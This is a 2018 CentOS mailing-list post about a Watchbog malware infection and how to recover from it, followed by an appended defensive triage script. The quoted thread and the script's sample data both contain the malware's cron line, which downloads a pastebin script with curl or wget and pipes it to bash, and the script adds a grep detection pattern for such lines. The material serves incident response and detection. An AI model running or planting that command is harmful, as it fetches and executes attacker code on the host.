[CentOS] CentOS 7.5 Linux box got infected with Watchbog malware

Tue Dec 18 14:31:55 UTC 2018
mark <m.roth at 5-cent.us>

Valeri Galtsev wrote:
> On 12/17/18 2:57 PM, Mauricio Tavares wrote:
>> On Sat, Dec 15, 2018 at 12:40 PM Kaushal Shriyan
>> <kaushalshriyan at gmail.com> wrote:
>>> Is there a way to find out how the CentOS 7.5 Linux box got infected
>>> with malware? Currently I am referring to
>>> http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html
>>> to carry out the below steps, which is done manually.
>>> 1)rm -fr /tmp/*timesyncc.service*
>>> 2)crontab -e -u apigee
>>> delete the cron entry */1 * * * * (curl -fsSL
>>> https://pastebin.com/raw/aGTSGJJp||wget -q -O-
>>> https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
>>> 3)ps aux | grep watchbog
>>> kill -9 $(pidof watchbog)
>>> Any suggestions or recommendations to find out how CentOS 7.5 Linux
>>> box got infected with Watchbog Malware. Is there any open source
>>> software which can be installed on CentOS 7.5 Linux box to detect and
>>> prevent Malware?
>> do you have untampered log files?
> Standard compromise recovery procedure since forever is (your local
> policy may have slightly different order about notifications and similar):
> 1. back up all user data

You should have been doing that all along.

First step, before you do anything else, is pull the hard drive, put it
into a hot-swap or external bay, and dd the entire drive to an identical
one. THAT goes to forensics.

Alternatively, pull the h/d, put in a new one, reset the BIOS to factory
settings - that includes pulling the battery... *then* set what you need,
and then build it new, and restore from backups.
Why, yes, we did just do this, um, last year, after a compromise via a
WordPress security hole. It did not manage to get to any other systems (we
checked, and only a few run WordPress).
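A small triage script, added here as an example and not part of the thread, that checks for the two persistence artefacts the thread quotes: a cron entry that pipes curl/wget output straight into bash, and files matching `*timesyncc.service*` in /tmp. Only that cron pattern, the pastebin URL and the /tmp glob come from the thread; the function names (`find_pipe_to_shell`, `count_pipe_to_shell`, `count_timesyncc_files`, `scan_host`) and the sample crontab are constructed for illustration. It is meant to be run on the forensic copy or on the suspect host before rebuilding, so the findings can be recorded rather than just deleted.

```sh
#!/bin/sh
# Added example, not from the thread: triage checks for the watchbog
# persistence artefacts described above. Function names and the sample
# crontab below are constructed; only the patterns come from the thread.

# Print every crontab line on stdin that downloads with curl or wget and
# pipes the result straight into a shell. Exit status 0 when something matched.
find_pipe_to_shell() {
    grep -E '(curl|wget).*\|[[:space:]]*(ba)?sh([[:space:]>;&]|$)'
}

# Count such lines in a crontab passed as a single string argument.
count_pipe_to_shell() {
    printf '%s\n' "$1" | find_pipe_to_shell | wc -l | tr -d ' '
}

# Count files matching the dropper name quoted in the thread, in the
# directory given as $1 (defaults to /tmp). Returns 0 when the glob matches nothing.
count_timesyncc_files() {
    dir=${1:-/tmp}
    n=0
    for f in "$dir"/*timesyncc.service*; do
        [ -e "$f" ] && n=$((n + 1))
    done
    echo "$n"
}

# Constructed sample crontab: two benign jobs plus the job quoted in the thread.
# The third line fetches with wget but does not pipe into a shell, so it must not match.
SAMPLE_CRONTAB='0 3 * * * /usr/local/bin/backup.sh
*/1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
*/5 * * * * /usr/bin/wget -q http://mirror.example/status -O /var/tmp/status'

# Live host check (run as root): every local user's crontab, the /tmp glob,
# and any process whose command line mentions watchbog. Prints only findings.
scan_host() {
    cut -d: -f1 /etc/passwd | while read -r user; do
        crontab -l -u "$user" 2>/dev/null | find_pipe_to_shell | sed "s/^/cron($user): /"
    done
    for f in /tmp/*timesyncc.service*; do
        [ -e "$f" ] && echo "tmp: $f"
    done
    pgrep -fl watchbog | sed 's/^/proc: /'
}

# Demonstration on the constructed sample: prints the one suspicious line and its count.
printf '%s\n' "$SAMPLE_CRONTAB" | find_pipe_to_shell
echo "suspicious cron lines: $(count_pipe_to_shell "$SAMPLE_CRONTAB")"
```

Call `scan_host` on the suspect system (or point `count_timesyncc_files` at the mounted image's /tmp) and keep the output with the disk image; the grep pattern also catches the `|sh` variant and is deliberately a bit broad, so review hits by hand rather than deleting them automatically.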